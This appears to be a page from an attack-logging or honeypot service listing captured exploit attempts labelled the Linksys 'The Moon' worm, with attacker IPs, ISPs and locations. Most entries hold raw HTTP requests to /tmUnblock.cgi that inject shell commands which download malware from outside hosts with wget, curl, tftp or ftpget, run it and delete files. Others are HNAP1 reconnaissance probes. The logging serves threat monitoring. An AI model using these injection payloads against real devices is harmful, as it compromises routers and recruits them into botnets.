This website uses cookies to improve user experience. By using this website you consent to all cookies in accordance with our terms.

Dismiss
Click here for some search hints
1-10 of 9894 results (990 pages)

Linksys "The Moon" Worm

[Attack info]
Attacker: 93.56.109.163
Dest. port: 8080
Time: 29/09/2020 23:25:11
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS12874 Fastweb SpA
Location: Lombardy, Milan (zipcode 20121)
POST /tmUnblock.cgi HTTP/1.1 Content-Length: 227 accept-encoding: gzip, deflate connection: keep-alive Accept: / User-Agent: python-requests/2.20.0 Host: 127.0.0.1:80 Content-Type: application/x-www-form-urlencoded ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+Astra.mpsl%3B+wget+http%3A%2F%2F192.210.214.51%2Fbins%2FAstra.mpsl%3B+chmod+777+Astra.mpsl%3B+.%2FAstra.mpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&Sta

Linksys "The Moon" Worm

[Attack info]
Attacker: 61.79.81.114
Dest. port: 8080
Time: 29/09/2020 18:01:36
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS4766 Korea Telecom
Location: Seoul, Jungnang-gu (zipcode 02099)
POST /tmUnblock.cgi HTTP/1.1 Content-Length: 227 accept-encoding: gzip, deflate connection: keep-alive Accept: / User-Agent: python-requests/2.20.0 Host: 127.0.0.1:80 Content-Type: application/x-www-form-urlencoded ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+Astra.mpsl%3B+wget+http%3A%2F%2F107.175.87.103%2Fbins%2FAstra.mpsl%3B+chmod+777+Astra.mpsl%3B+.%2FAstra.mpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&Sta

Linksys "The Moon" Worm

[Attack info]
Attacker: 24.50.19.112
Dest. port: 8080
Time: 24/09/2020 11:21:06
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS26801 Zito Media, L.P.
Location: Pennsylvania, Penfield (zipcode 15849)
POST /tmUnblock.cgi HTTP/1.1 Content-Length: 227 accept-encoding: gzip, deflate connection: keep-alive Accept: / User-Agent: python-requests/2.20.0 Host: 37.49.226.210:80 Content-Type: application/x-www-form-urlencoded ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+mpsl%3B+wget+http%3A%2F%2F37.49.226.210%2Freaper%2Freap.mpsl%3B+chmod+777+reap.mpsl%3B+.%2Freap.mpsl+Reaper.linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&Star

Linksys "The Moon" Worm

[Attack info]
Attacker: 178.32.27.73
Dest. port: 8080
Time: 20/09/2020 03:26:41
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS16276 OVH SAS
Location: Hauts-de-France, Gravelines (zipcode 59820)
POST /HNAP1/ HTTP/1.0 Content-Length: 345 accept-encoding: deflate, gzip, identity soapaction: "http://purenetworks.com/HNAP1/GetRouterLanSettings2" Host: 110.216.28.197:8080 Accept: text/html, */* User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 connection: keep-alive authorization: Basic Og== <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"> <soap:Body> <GetRouterLanSettings2 xmlns="http://purenetworks.com/HNAP1/"> </GetRouterLanSettings2> </soap:Body> </soap:Envelope>

Linksys "The Moon" Worm

[Attack info]
Attacker: 178.32.27.73
Dest. port: 8080
Time: 20/09/2020 03:26:41
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS16276 OVH SAS
Location: Hauts-de-France, Gravelines (zipcode 59820)
POST /HNAP1/ HTTP/1.0 Content-Length: 331 accept-encoding: deflate, gzip, identity soapaction: "http://purenetworks.com/HNAP1/GetWanSettings" Host: 110.216.28.197:8080 Accept: text/html, */* User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 connection: keep-alive <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"> <soap:Body> <GetWanSettings xmlns="http://purenetworks.com/HNAP1/"> </GetWanSettings> </soap:Body> </soap:Envelope>

Linksys "The Moon" Worm

[Attack info]
Attacker: 178.32.27.73
Dest. port: 8080
Time: 20/09/2020 03:26:40
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS16276 OVH SAS
Location: Hauts-de-France, Gravelines (zipcode 59820)
POST /HNAP1/ HTTP/1.0 Content-Length: 337 accept-encoding: deflate, gzip, identity soapaction: "http://purenetworks.com/HNAP1/GetRouterSettings" Host: 110.216.28.197:8080 Accept: text/html, */* User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 connection: keep-alive authorization: Basic Og== <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"> <soap:Body> <GetRouterSettings xmlns="http://purenetworks.com/HNAP1/"> </GetRouterSettings> </soap:Body> </soap:Envelope>

Linksys "The Moon" Worm

[Attack info]
Attacker: 178.32.27.73
Dest. port: 8080
Time: 20/09/2020 03:26:39
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS16276 OVH SAS
Location: Hauts-de-France, Gravelines (zipcode 59820)
POST /HNAP1/ HTTP/1.0 Content-Length: 329 accept-encoding: deflate, gzip, identity soapaction: "http://purenetworks.com/HNAP1/IsDeviceReady" Host: 110.216.28.197:8080 Accept: text/html, */* User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 connection: keep-alive <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"> <soap:Body> <IsDeviceReady xmlns="http://purenetworks.com/HNAP1/"> </IsDeviceReady> </soap:Body> </soap:Envelope>

Linksys "The Moon" Worm

[Attack info]
Attacker: 181.143.101.194
Dest. port: 8080
Time: 16/09/2020 13:15:23
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS13489 EPM Telecomunicaciones S.A. E.S.P.
Location: Antioquia, Medellín (zipcode 050021)
rDNS: static-181-143-101-194.une.net.co
POST /tmUnblock.cgi HTTP/1.1 Content-Length: 200 accept-encoding: gzip, deflate connection: keep-alive Accept: / User-Agent: Hello, World Host: 127.0.0.1:8080 Content-Type: application/x-www-form-urlencoded ttcp_ip=-h+%60cd+%2Ftmp%3B+wget+http%3A%2F%2F51.222.26.189%2Fyakuza.mpsl%3B+chmod+777+yakuza.mpsl%3B+.%2Fyakuza.mpsl%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1

Linksys "The Moon" Worm

[Attack info]
Attacker: 181.143.101.194
Dest. port: 8080
Time: 14/09/2020 18:26:27
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS13489 EPM Telecomunicaciones S.A. E.S.P.
Location: Antioquia, Medellín (zipcode 050021)
rDNS: static-181-143-101-194.une.net.co
POST /tmUnblock.cgi HTTP/1.1 Content-Length: 200 accept-encoding: gzip, deflate connection: keep-alive Accept: / User-Agent: Hello, World Host: 127.0.0.1:8080 Content-Type: application/x-www-form-urlencoded ttcp_ip=-h+%60cd+%2Ftmp%3B+wget+http%3A%2F%2F51.222.26.189%2Fyakuza.mpsl%3B+chmod+777+yakuza.mpsl%3B+.%2Fyakuza.mpsl%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1

Linksys "The Moon" Worm

[Attack info]
Attacker: 209.141.51.85
Dest. port: 8080
Time: 11/09/2020 15:37:17
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS53667 FranTech Solutions
Location: Nevada, Las Vegas (zipcode 89101)
rDNS: clientvps.com
POST /tmUnblock.cgi HTTP/1.1 Content-Length: 736 accept-encoding: gzip, deflate Host: 176.94.18.109:8080 Accept: */* User-Agent: python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.33.1.el6.x86_64 connection: keep-alive Content-Type: application/x-www-form-urlencoded ttcp_ip=-h+%60cd+%2Ftmp+%7C%7C+cd+%2Fvar%2Frun+%7C%7C+cd+%2Fmnt+%7C%7C+cd+%2Froot+%7C%7C+cd+%2F%3B+wget+http%3A%2F%2F185.172.111.196%2Frouters-eps.sh%3B+curl+-O+http%3A%2F%2F185.172.111.196%2Frouters-eps.sh%3B+chmod+777+routers-eps.sh%3B+sh+routers-eps.sh%3B+tftp+185.172.111.196+-c+get+routers-eps3.sh%3B+chmod+777+routers-eps3.sh%3B+sh+routers-eps3.sh%3B+tftp+-r+routers-eps2.sh+-g+185.172.111.196%3B+chmod+777+routers-eps2.sh%3B+sh+routers-eps2.sh%3B+ftpget+-v+-u+anonymous+-p+anonymous+-P+21+185.172.111.196+routers-eps1.sh+routers-eps1.sh%3B+sh+routers-eps1.sh%3B+rm+-rf+routers-eps.sh+routers-eps3.sh+routers-eps2.sh+routers-eps1.sh%3B+rm+-rf+%2A%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1